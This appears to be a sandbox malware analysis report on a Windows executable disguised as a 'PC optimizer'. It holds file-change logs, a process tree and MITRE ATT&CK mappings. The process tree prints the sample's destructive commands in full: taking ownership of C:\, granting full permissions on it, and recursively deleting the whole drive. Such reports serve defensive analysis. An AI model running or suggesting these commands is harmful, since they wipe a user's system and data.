File opened for modification	C:\Windows\winsxs\AM2927~1.163\Amd64\OK9IBRES.DLL	cmd.exe
File opened for modification	C:\Windows\winsxs\AM65CF~1.163\Amd64\hpb8300t.gpd	cmd.exe
File opened for modification	C:\Windows\winsxs\Backup\AM9723~1.DLL	cmd.exe
File opened for modification	C:\Windows\winsxs\FileMaps\$$A1E6~1.CDF	cmd.exe
File opened for modification	C:\Windows\winsxs\MANIFE~2\AMC518~1.MAN	cmd.exe
File opened for modification	C:\Windows\MICROS~1.NET\FRAMEW~2\V20~1.507\DE\System.Management.Resources.dll	cmd.exe
File opened for modification	C:\Windows\winsxs\MANIFE~2\AM2EEA~1.MAN	cmd.exe
File opened for modification	C:\Windows\SERVIC~1\Packages\WI6F83~1.MUM	cmd.exe
File opened for modification	C:\Windows\winsxs\AMF1E5~1.163\85s1257.fon	cmd.exe
File opened for modification	C:\Windows\winsxs\AMAD61~1.163\WINSRV~1.ADM	cmd.exe
File opened for modification	C:\Windows\winsxs\AMFE0E~1.163\LMHSVC~1.MUI	cmd.exe
File opened for modification	C:\Windows\winsxs\AMA602~1.163\TABLET~1.MUI	cmd.exe
File opened for modification	C:\Windows\winsxs\AMD84F~2.163\CNBBR3~1.MUI	cmd.exe
File opened for modification	C:\Windows\winsxs\MANIFE~2\AM1865~1.MAN	cmd.exe
File opened for modification	C:\Windows\winsxs\AM6A02~2.163\SETXEX~1.MUI	cmd.exe
File opened for modification	C:\Windows\winsxs\Backup\AM8E87~1.MAN	cmd.exe
File opened for modification	C:\Windows\winsxs\FileMaps\PR5294~1.CDF	cmd.exe
File opened for modification	C:\Windows\winsxs\MANIFE~2\AM5D45~1.MAN	cmd.exe
File opened for modification	C:\Windows\winsxs\Backup\AM45A1~1.MAN	cmd.exe
File opened for modification	C:\Windows\SERVIC~1\Packages\MID2BF~1.CAT	cmd.exe
File opened for modification	C:\Windows\winsxs\AM9C8D~1.163\8514oemg.fon	cmd.exe
File opened for modification	C:\Windows\winsxs\AM8A18~2.163\basics2.h1s	cmd.exe
File opened for modification	C:\Windows\winsxs\AMD0F3~1.163\langreg.h1s	cmd.exe
File opened for modification	C:\Windows\winsxs\AM9FB7~1.175\IEXPLO~1.MUI	cmd.exe
File opened for modification	C:\Windows\winsxs\MANIFE~2\AM8C9D~1.MAN	cmd.exe
File opened for modification	C:\Windows\winsxs\AMCE8A~1.163\adsutil.ini	cmd.exe
File opened for modification	C:\Windows\winsxs\AMB163~1.175\DRM-DL.man	cmd.exe
File opened for modification	C:\Windows\winsxs\Backup\AM30DC~1.MAN	cmd.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	2756	takeown.exe
Token: SeTakeOwnershipPrivilege	2756	takeown.exe
Token: SeTakeOwnershipPrivilege	2756	takeown.exe
Token: SeTakeOwnershipPrivilege	2756	takeown.exe
Token: SeTakeOwnershipPrivilege	2756	takeown.exe
Token: SeTakeOwnershipPrivilege	2756	takeown.exe
Token: SeTakeOwnershipPrivilege	2756	takeown.exe
Token: SeTakeOwnershipPrivilege	2756	takeown.exe
Token: SeTakeOwnershipPrivilege	2756	takeown.exe

Suspicious use of WriteProcessMemory 27 IoCs

description	pid	Process	procid_target
PID 3036 wrote to memory of 2740	3036	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	31
PID 3036 wrote to memory of 2740	3036	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	31
PID 3036 wrote to memory of 2740	3036	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	31
PID 2740 wrote to memory of 3060	2740	cmd.exe	32
PID 2740 wrote to memory of 3060	2740	cmd.exe	32
PID 2740 wrote to memory of 3060	2740	cmd.exe	32
PID 2740 wrote to memory of 2652	2740	cmd.exe	33
PID 2740 wrote to memory of 2652	2740	cmd.exe	33
PID 2740 wrote to memory of 2652	2740	cmd.exe	33
PID 3036 wrote to memory of 2688	3036	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	34
PID 3036 wrote to memory of 2688	3036	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	34
PID 3036 wrote to memory of 2688	3036	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	34
PID 2688 wrote to memory of 2756	2688	cmd.exe	35
PID 2688 wrote to memory of 2756	2688	cmd.exe	35
PID 2688 wrote to memory of 2756	2688	cmd.exe	35
PID 3036 wrote to memory of 2768	3036	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	36
PID 3036 wrote to memory of 2768	3036	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	36
PID 3036 wrote to memory of 2768	3036	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	36
PID 2768 wrote to memory of 2796	2768	cmd.exe	37
PID 2768 wrote to memory of 2796	2768	cmd.exe	37
PID 2768 wrote to memory of 2796	2768	cmd.exe	37
PID 3036 wrote to memory of 2836	3036	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	38
PID 3036 wrote to memory of 2836	3036	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	38
PID 3036 wrote to memory of 2836	3036	d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe	38
PID 2836 wrote to memory of 2760	2836	cmd.exe	39
PID 2836 wrote to memory of 2760	2836	cmd.exe	39
PID 2836 wrote to memory of 2760	2836	cmd.exe	39

C:\Users\Admin\AppData\Local\Temp\d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe
"C:\Users\Admin\AppData\Local\Temp\d30896edbec33b0a143e60e5588d7304998614b8a4400cc9a5d37e5b75210a97N.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c chcp 65001 && cls && title PC FUCKER OPTIMIZER && color 0B && mode 145,30
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:3060
- - C:\Windows\system32\mode.com
    mode 145,30
    3⤵
    PID:2652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start /B takeown /f C:\ /r /d y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2688
- - C:\Windows\system32\takeown.exe
    takeown /f C:\ /r /d y
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start /B icacls C:\ /grant administrators:F /t
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Windows\system32\icacls.exe
    icacls C:\ /grant administrators:F /t
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:2796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start /B cmd /c rd /s /q C:\
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2836
- - C:\Windows\system32\cmd.exe
    cmd /c rd /s /q C:\
    3⤵
    - Drops file in Drivers directory
    - Manipulates Digital Signatures
    - Boot or Logon Autostart Execution: Print Processors
    - Deletes itself
    - Drops desktop.ini file(s)
    - Drops autorun.inf file
    - Drops file in System32 directory
    - Modifies termsrv.dll
    - Drops file in Program Files directory
    - Drops file in Windows directory
    PID:2760

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Print Processors

T1547.012

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Print Processors

T1547.012

Defense Evasion

File and Directory Permissions Modification

T1222

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3036-0-0x000000013FDF0000-0x000000013FE4A000-memory.dmp

Filesize
360KB

Download
memory/3036-2-0x000000013FDF0000-0x000000013FE4A000-memory.dmp

Filesize
360KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads